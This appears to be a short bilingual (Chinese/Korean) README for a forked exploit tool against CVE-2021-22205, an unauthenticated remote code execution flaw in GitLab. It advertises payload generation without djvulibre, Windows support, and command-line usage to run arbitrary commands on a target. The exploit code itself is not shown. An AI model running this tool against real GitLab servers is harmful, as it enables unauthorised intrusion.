
CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖,可在win平台使用
mr-r3bot/Gitlab-CVE-2021-22205 의 Fork 기반
CVE-2021-22205: Gitlab 비인가 원격 코드 실행 취약점 EXP
djvumake 및 djvulibre에 대한 의존성을 제거하고, 내부에서 직접 payload를 생성하여 Windows 플랫폼에서 실행 가능합니다.
# 인증 필요
python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <command>
# 비인가
python3 exploit.py -t <gitlab_url> -c <command>